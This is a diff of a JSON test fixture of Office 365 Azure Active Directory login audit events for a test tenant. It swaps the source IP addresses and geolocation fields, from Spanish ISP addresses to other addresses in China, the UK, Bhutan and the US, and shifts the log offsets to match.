+ "client.ip": "175.16.199.1",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -1208,7 +1189,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 17114,
+ "log.offset": 17092,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -1225,10 +1206,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:13:08",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -1257,20 +1238,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -1288,8 +1267,8 @@
 },
 {
 "@timestamp": "2020-02-07T16:43:27.000Z",
- "client.address": "213.97.47.133",
- "client.ip": "213.97.47.133",
+ "client.address": "81.2.69.143",
+ "client.ip": "81.2.69.143",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -1307,7 +1286,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 18564,
+ "log.offset": 18540,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -1324,10 +1303,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "213.97.47.133",
+ "o365.audit.ActorIpAddress": "81.2.69.143",
 "o365.audit.ApplicationId": "00000002-0000-0ff1-ce00-000000000000",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "213.97.47.133",
+ "o365.audit.ClientIP": "81.2.69.143",
 "o365.audit.CreationTime": "2020-02-07T16:43:27",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -1356,20 +1335,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "213.97.47.133",
+ "related.ip": "81.2.69.143",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "213.97.47.133",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
@@ -1387,8 +1364,8 @@
 },
 {
 "@timestamp": "2020-02-08T14:33:54.000Z",
- "client.address": "37.29.234.179",
- "client.ip": "37.29.234.179",
+ "client.address": "67.43.156.12",
+ "client.ip": "67.43.156.12",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -1406,7 +1383,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 20013,
+ "log.offset": 19985,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -1423,10 +1400,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "37.29.234.179",
+ "o365.audit.ActorIpAddress": "67.43.156.12",
 "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "37.29.234.179",
+ "o365.audit.ClientIP": "67.43.156.12",
 "o365.audit.CreationTime": "2020-02-08T14:33:54",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -1455,17 +1432,16 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "37.29.234.179",
+ "related.ip": "67.43.156.12",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 16299,
- "source.as.organization.name": "XFERA Moviles S.A.",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 40.4172,
- "source.geo.location.lon": -3.684,
- "source.ip": "37.29.234.179",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "tags": [
 "forwarded"
 ],
@@ -1483,8 +1459,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:13:12.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -1502,7 +1478,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 21463,
+ "log.offset": 21433,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -1519,10 +1495,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:13:12",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -1551,20 +1527,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -1582,8 +1556,8 @@
 },
 {
 "@timestamp": "2020-02-12T21:38:35.000Z",
- "client.address": "79.159.10.151",
- "client.ip": "79.159.10.151",
+ "client.address": "216.160.83.57",
+ "client.ip": "216.160.83.57",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -1601,7 +1575,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 22913,
+ "log.offset": 22881,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -1618,10 +1592,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "79.159.10.151",
+ "o365.audit.ActorIpAddress": "216.160.83.57",
 "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "79.159.10.151",
+ "o365.audit.ClientIP": "216.160.83.57",
 "o365.audit.CreationTime": "2020-02-12T21:38:35",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -1650,20 +1624,19 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "79.159.10.151",
+ "related.ip": "216.160.83.57",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "79.159.10.151",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
+ "source.geo.continent_name": "North America",
+ "source.geo.country_iso_code": "US",
+ "source.geo.country_name": "United States",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.57",
 "tags": [
 "forwarded"
 ],
@@ -1681,8 +1654,8 @@
 },
 {
 "@timestamp": "2020-02-08T14:38:40.000Z",
- "client.address": "37.29.234.179",
- "client.ip": "37.29.234.179",
+ "client.address": "67.43.156.12",
+ "client.ip": "67.43.156.12",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -1700,7 +1673,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 24306,
+ "log.offset": 24274,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -1717,10 +1690,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "37.29.234.179",
+ "o365.audit.ActorIpAddress": "67.43.156.12",
 "o365.audit.ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "37.29.234.179",
+ "o365.audit.ClientIP": "67.43.156.12",
 "o365.audit.CreationTime": "2020-02-08T14:38:40",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -1749,17 +1722,16 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "37.29.234.179",
+ "related.ip": "67.43.156.12",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 16299,
- "source.as.organization.name": "XFERA Moviles S.A.",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 40.4172,
- "source.geo.location.lon": -3.684,
- "source.ip": "37.29.234.179",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "tags": [
 "forwarded"
 ],
@@ -1777,8 +1749,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:13:16.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -1796,7 +1768,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 25755,
+ "log.offset": 25721,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -1813,10 +1785,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:13:16",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -1845,20 +1817,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -1876,8 +1846,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:13:16.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -1895,7 +1865,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 27205,
+ "log.offset": 27169,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -1912,10 +1882,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:13:16",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -1944,20 +1914,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -1975,8 +1943,8 @@
 },
 {
 "@timestamp": "2020-02-12T21:38:25.000Z",
- "client.address": "79.159.10.151",
- "client.ip": "79.159.10.151",
+ "client.address": "216.160.83.57",
+ "client.ip": "216.160.83.57",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -1994,7 +1962,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 28655,
+ "log.offset": 28617,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -2011,10 +1979,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "79.159.10.151",
+ "o365.audit.ActorIpAddress": "216.160.83.57",
 "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "79.159.10.151",
+ "o365.audit.ClientIP": "216.160.83.57",
 "o365.audit.CreationTime": "2020-02-12T21:38:25",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2043,20 +2011,19 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "79.159.10.151",
+ "related.ip": "216.160.83.57",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "79.159.10.151",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
+ "source.geo.continent_name": "North America",
+ "source.geo.country_iso_code": "US",
+ "source.geo.country_name": "United States",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.57",
 "tags": [
 "forwarded"
 ],
@@ -2074,8 +2041,8 @@
 },
 {
 "@timestamp": "2020-02-07T16:44:04.000Z",
- "client.address": "213.97.47.133",
- "client.ip": "213.97.47.133",
+ "client.address": "81.2.69.143",
+ "client.ip": "81.2.69.143",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -2093,7 +2060,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 30048,
+ "log.offset": 30010,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -2110,10 +2077,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "213.97.47.133",
+ "o365.audit.ActorIpAddress": "81.2.69.143",
 "o365.audit.ApplicationId": "08e18876-6177-487e-b8b5-cf950c1e598c",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "213.97.47.133",
+ "o365.audit.ClientIP": "81.2.69.143",
 "o365.audit.CreationTime": "2020-02-07T16:44:04",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2142,20 +2109,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "213.97.47.133",
+ "related.ip": "81.2.69.143",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "213.97.47.133",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "forwarded"
 ],
@@ -2173,8 +2138,8 @@
 },
 {
 "@timestamp": "2020-02-12T10:51:45.000Z",
- "client.address": "79.159.10.151",
- "client.ip": "79.159.10.151",
+ "client.address": "216.160.83.57",
+ "client.ip": "216.160.83.57",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -2192,7 +2157,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 31498,
+ "log.offset": 31456,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -2209,10 +2174,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "79.159.10.151",
+ "o365.audit.ActorIpAddress": "216.160.83.57",
 "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "79.159.10.151",
+ "o365.audit.ClientIP": "216.160.83.57",
 "o365.audit.CreationTime": "2020-02-12T10:51:45",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2241,20 +2206,19 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "79.159.10.151",
+ "related.ip": "216.160.83.57",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "79.159.10.151",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
+ "source.geo.continent_name": "North America",
+ "source.geo.country_iso_code": "US",
+ "source.geo.country_name": "United States",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.57",
 "tags": [
 "forwarded"
 ],
@@ -2272,8 +2236,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:13:01.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -2291,7 +2255,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 32948,
+ "log.offset": 32906,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -2308,10 +2272,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:13:01",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2340,20 +2304,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -2371,8 +2333,8 @@
 },
 {
 "@timestamp": "2020-02-07T16:43:51.000Z",
- "client.address": "213.97.47.133",
- "client.ip": "213.97.47.133",
+ "client.address": "81.2.69.143",
+ "client.ip": "81.2.69.143",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -2390,7 +2352,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 34398,
+ "log.offset": 34354,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -2407,10 +2369,10 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "213.97.47.133",
+ "o365.audit.ActorIpAddress": "81.2.69.143",
 "o365.audit.ApplicationId": "00000003-0000-0ff1-ce00-000000000000",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "213.97.47.133",
+ "o365.audit.ClientIP": "81.2.69.143",
 "o365.audit.CreationTime": "2020-02-07T16:43:51",
 "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2439,20 +2401,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
